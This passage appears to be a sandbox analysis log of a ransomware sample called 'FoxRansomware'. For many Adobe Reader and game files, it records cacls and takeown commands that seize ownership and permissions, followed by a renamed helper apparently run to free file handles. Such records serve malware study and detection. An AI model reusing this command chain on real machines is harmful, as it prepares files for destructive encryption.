C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths"3⤵PID:4064
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "usa03.ths" -nobanner3⤵PID:4312
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "usa03.ths" -nobanner4⤵PID:4076
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4348
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT""2⤵PID:4352
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G Admin:F /C3⤵PID:4480
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"3⤵PID:4488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "GREEK.TXT" -nobanner3⤵PID:4504
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "GREEK.TXT" -nobanner4⤵PID:4512
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4624
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""2⤵PID:4664
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G Admin:F /C3⤵PID:4676
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"3⤵
- Modifies file permissions
PID:4376
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "CP1253.TXT" -nobanner3⤵PID:4388
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "CP1253.TXT" -nobanner4⤵PID:4392
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png""2⤵PID:4496
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png" /E /G Admin:F /C3⤵PID:4468
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Microsoft Games\Mahjong\MahjongMCE.png"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4424
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "MahjongMCE.png" -nobanner3⤵PID:4592
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "MahjongMCE.png" -nobanner4⤵PID:4608
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4580
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini""2⤵PID:4544
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini" /E /G Admin:F /C3⤵PID:4576
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini"3⤵
- Modifies file permissions
PID:4564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "eula.ini" -nobanner3⤵PID:4692
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "eula.ini" -nobanner4⤵PID:4700
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4732
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc""2⤵PID:4744
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc" /E /G Admin:F /C3⤵PID:4768
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc"3⤵PID:4804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "AcroSign.prc" -nobanner3⤵PID:4824
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "AcroSign.prc" -nobanner4⤵PID:4808
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4856
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini""2⤵PID:4884
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C3⤵PID:4820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"3⤵PID:5000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "AGMGPUOptIn.ini" -nobanner3⤵PID:4988
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "AGMGPUOptIn.ini" -nobanner4⤵PID:5088
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4924
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer""2⤵PID:4904
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer" /E /G Admin:F /C3⤵PID:4960
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer"3⤵PID:4968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "AUMProduct.cer" -nobanner3⤵PID:4972
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "AUMProduct.cer" -nobanner4⤵PID:4980
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""2⤵PID:5028
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C3⤵PID:5060
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"3⤵PID:5076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "forms_distributed.gif" -nobanner3⤵PID:5080
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "forms_distributed.gif" -nobanner4⤵PID:5092
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5100
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""2⤵PID:4716
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C3⤵PID:5160
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"3⤵PID:5196
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "reviews_sent.gif" -nobanner3⤵PID:5204
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "reviews_sent.gif" -nobanner4⤵PID:5200
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5236
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif""2⤵PID:5176
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C3⤵PID:5272
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"3⤵PID:5292
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "stop_collection_data.gif" -nobanner3⤵PID:5288
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "stop_collection_data.gif" -nobanner4⤵PID:5308
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5324
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm""2⤵PID:5344
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" /E /G Admin:F /C3⤵PID:5364
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"3⤵PID:5380
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "ReadMe.htm" -nobanner3⤵PID:5384
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "ReadMe.htm" -nobanner4⤵PID:5388
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5456
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""2⤵PID:6720
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C3⤵PID:5420
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"3⤵PID:5448
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "MinionPro-It.otf" -nobanner3⤵PID:5464
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "MinionPro-It.otf" -nobanner4⤵PID:5432
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5496
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB""2⤵PID:5592
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C3⤵PID:5632
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"3⤵PID:5648
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "ZX______.PFB" -nobanner3⤵PID:5212
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "ZX______.PFB" -nobanner4⤵PID:5660
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5564
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp""2⤵PID:5684
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C3⤵PID:5724
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"3⤵PID:6924
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "brt04.hsp" -nobanner3⤵PID:5764
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "brt04.hsp" -nobanner4⤵PID:6908
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6916
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""2⤵PID:6900
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C3⤵PID:6980
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"3⤵
- Modifies file permissions
PID:6964
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "engphon.env" -nobanner3⤵PID:6960
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "engphon.env" -nobanner4⤵PID:6988
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7016
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""2⤵PID:7060
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C3⤵PID:5888
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"3⤵PID:7048
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "CORPCHAR.TXT" -nobanner3⤵PID:5756
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "CORPCHAR.TXT" -nobanner4⤵PID:5732
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5784
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT""2⤵PID:5864
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C3⤵PID:5664
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"3⤵PID:5900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "CP1250.TXT" -nobanner3⤵PID:5944
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "CP1250.TXT" -nobanner4⤵PID:5948
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6932
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""2⤵PID:6012
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C3⤵PID:5940
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"3⤵PID:5692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "MyriadCAD.otf" -nobanner3⤵PID:6024
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "MyriadCAD.otf" -nobanner4⤵PID:6092
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6100
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""2⤵PID:6796
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C3⤵PID:2668
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"3⤵
- Modifies file permissions
PID:6140
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "create_form.gif" -nobanner3⤵PID:7136
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "create_form.gif" -nobanner4⤵PID:1484
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:896
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif""2⤵PID:6016
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C3⤵PID:6000
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"3⤵PID:7112
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "info.gif" -nobanner3⤵PID:5860
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "info.gif" -nobanner4⤵PID:5828
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2916
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""2⤵PID:7052
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C3⤵PID:6056
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"3⤵
- Modifies file permissions
PID:6048
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "review_same_reviewers.gif" -nobanner3⤵PID:6164
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "review_same_reviewers.gif" -nobanner4⤵PID:6156
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1552
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""2⤵PID:6208
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C3⤵PID:6984
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"3⤵PID:7092
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "trash.gif" -nobanner3⤵PID:6224
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "trash.gif" -nobanner4⤵PID:6232
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6300
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""2⤵PID:220
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C3⤵PID:5512
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"3⤵PID:6340
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "CourierStd-Bold.otf" -nobanner3⤵PID:6316
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "CourierStd-Bold.otf" -nobanner4⤵PID:6376
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3256
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf""2⤵PID:6248
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf" /E /G Admin:F /C3⤵PID:6336
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf"3⤵PID:6452
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "MyriadPro-It.otf" -nobanner3⤵PID:6400
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "MyriadPro-It.otf" -nobanner4⤵PID:1444
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6504
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt""2⤵PID:6564
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C3⤵PID:6344
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"3⤵PID:6508
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner3⤵PID:6552
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner4⤵PID:1336
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1496
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DCr11KY9.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp""2⤵PID:6596
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C3⤵PID:6652
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"3⤵PID:6548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c NDS5iFeg.exe -accepteula "can.hyp" -nobanner3⤵PID:2268
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NDS5iFeg.exeNDS5iFeg.exe -accepteula "can.hyp" -nobanner4⤵PID:6624
-
-
-
